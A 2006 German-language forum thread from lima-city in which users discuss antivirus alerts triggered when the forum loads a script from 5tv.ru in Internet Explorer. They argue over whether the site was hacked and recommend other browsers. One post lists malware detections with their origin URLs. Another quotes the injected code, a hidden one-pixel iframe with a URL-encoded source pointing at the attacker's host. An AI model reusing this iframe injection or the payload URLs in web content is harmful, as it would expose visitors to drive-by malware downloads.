Was ist mitm Forum los??
lima-city → Forum → lima-city Allgemein → lima-city Allgemein
anscheinend
beitrag
benutzer
beweis
bild
buggy
damal
dateiname
dokument
einstellung
europ
firewall
lokale einstellungen
message
opus
paar technische details
skript
startseite
username
window
-
Tag leut,
Wei? nicht wie es bei euch isch, wenn ich aber mit IE ins Forum m?chte ladet er mit einen script von www.5tv.ru und mein antivir spingt an, es ?ffnet sich ein eingabefenster und ab da h?ngt alles??....
Beitrag ge?ndert am 29.07.2006 11:29 von singen -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
das war hier glaube ich schon mal.
Da wurde lima gehackt?! -
Bei mir kommt nichts,
und ich hab Kaspersky und ne Firewall
Aber ich bin nicht mitn IE drin sondern mitn FF (FireFox)
Beitrag ge?ndert am 29.07.2006 16:51 von elchfarm -
Hi. Wenn man als nicht eingeloggter Benutzer ins Forum schaut, passiert nichts.
Nur wenn ein eingeloggter Benutzer das Forum ?ffnet, wird auch der Virus mitge?ffnet.
Anscheinend wurde lima-city mal wieder gehackt.
L?sung, um lima-city weiterhin verwenden zu k?nnen: Alle Skripts blockieren.
Ein paar technische Details der beiden Viren:
Betrifft nur Benutzer von Mircosoft Windows
Virenname (nach Symantec): "Downloader"
Art: EMF-Bild
Dateiname: Microsoft_Windows_Advanced_Upgrade_Wizard_Logo2______________________________________________________________________1].emf
Ablageort: C:\Dokumente und Einstellungen\[UserName]\Lokale Einstellungen\Temporary Internet Files\Content.IE5\
Originalablageort: http.//www.5tv.ru/images/avatars/pic/files/spl/Microsoft_Windows_Advanced_Upgrade_Wizard_Logo2______________________________________________________________________.emf
Virenname (nach Symantec): "Downloader"
Art: HTML-Dokument
Dateiname: fillmem[1].htm
Ablageort: C:\Dokumente und Einstellungen\[UserName]\Lokale Einstellungen\Temporary Internet Files\Content.IE5\
Originalablageort: http.//www.5tv.ru/images/avatars/pic/files/spl/onload/fillmem.php
-
hallo,
also ich serve mit firefox und bei mir kam keine virus meldung o.?. allerdings ist die startseite ziemlich laggig heut...
m.f.g.
Maiki28 -
und was ist mit uinseren ACC ist das jetzt gefahrlich fur uns ?
-
du wirst doch sicherlich ein antivirus programm und eine firewall drauf haben oder nicht?!?!
ist also auch nicht gef?hrlicher als ?berall sonst im netz... ;) -
Also ich surfe mit dem Internet Explorer und kriege keine Message?
Also ich merke nichts von irgendeinem Problem, denn ich krieg keine Message, oder irgendwelche Fehler treten auf.
Hm...naja.. -
Hi. Wenn man als nicht eingeloggter Benutzer ins Forum schaut, passiert nichts.
Nur wenn ein eingeloggter Benutzer das Forum ?ffnet, wird auch der Virus mitge?ffnet.
Wie du siehst, bin ich eingeloggt, und ich kann dir versichern, dass auf der Version der Startseite des Lima-Forums, die ich empfangen habe, kein "Virus" hockt. Es wird auch dieses obskure JavaScript nicht aufgerufen -- weil es nicht im Quelltext der Seite steckt.
Anscheinend wurde lima-city mal wieder gehackt.
Behaupte nichts, was du nicht beweisen kannst.
L?sung, um lima-city weiterhin verwenden zu k?nnen: Alle Skripts blockieren.
Wirkliche L?sung: Einen Browser verwenden und nicht dieses buggy Teil von M$FT.
http://www.opera.com/
http://www.mozilla.com/firefox/
JavaScript kann man in gew?hnlichen Browsern ?brigens per Mausklick (oder Tastenkombi) ausschalten. Dazu muss man nichts "blockieren".
Ein paar technische Details der beiden Viren:
Betrifft nur Benutzer von Mircosoft Windows
Virenname (nach Symantec): "Downloader"
Art: EMF-Bild
Dateiname: Microsoft_Windows_Advanced_Upgrade_Wizard_Logo2______________________________________________________________________1].emf
Ablageort: C:\Dokumente und Einstellungen\[UserName]\Lokale Einstellungen\Temporary Internet Files\Content.IE5\
Originalablageort: http.//www.5tv.ru/images/avatars/pic/files/spl/Microsoft_Windows_Advanced_Upgrade_Wizard_Logo2______________________________________________________________________.emf
Virenname (nach Symantec): "Downloader"
Art: HTML-Dokument
Dateiname: fillmem[1].htm
Ablageort: C:\Dokumente und Einstellungen\[UserName]\Lokale Einstellungen\Temporary Internet Files\Content.IE5\
Originalablageort: http.//www.5tv.ru/images/avatars/pic/files/spl/onload/fillmem.php
Welche Details sollen das sein? Das sind technische Details:
http://de.wikipedia.org/wiki/Buffer-Overflow -
Also ich benutze ienfach opera da funktioniert alle perfekt
-
vllt hat das ja was mit dem Ausfall von Lima letztens zu tun... war einfach weg... aber gehackt? hmmm, dann m?sste ja ein Server wieder total im "arsch" sein... sorry, wegen dem Wort...
-
Hier is auch der Code der f?r den Bl?dsinn verantwortlich ist:
...News aus lima-city.de!<html><iframe src=http://%77%77%77%2e%35%74%76%2e%72%75/images/avatars/pic/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>, 6029 Antworten...
...steht ziemlich am Anfang. -
joa, es handelt sich wohl um den selben schei?, wie vor ein paar monaten.
wer seinen IE seit einem halben jahr nicht mehr auf den aktuellen stand gebracht hat, wird die genannten meldungen erhalten....
viel schlimmer ist aber, dass der mysql server offline ist...
-
hab das problem auch. aber nicht regelm??ig. mein ie h?ngt sich dann immer auf. wenn ich ihn aber nicht beende und einfach einen 2. aufmache funzt wieder alles.
-
Wer jetzt immernoch standardgem?? den IE verwendet is selber schuld, denn der braucht immer eine extra Wurst javascript captureEvent mag er nich oder in AJAX ActiveXObject...
Deshalb verwenden ja auch ?ber 20% der Europ?er den Firefox
Gru -
Das Problem hab ich schon am 10.8 gemeldet
Der Opera st?zt n?mlich bei der FAQ ab...naja. Mir wurde gesagt es liegt an mir, vor zwei Tagen hatte ein User das Gleiche Problem und hat auch ein Ticket geschrieben...also die Chefetage d?rfte ?ber das ..?h...Ereignis informiert sein
-
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
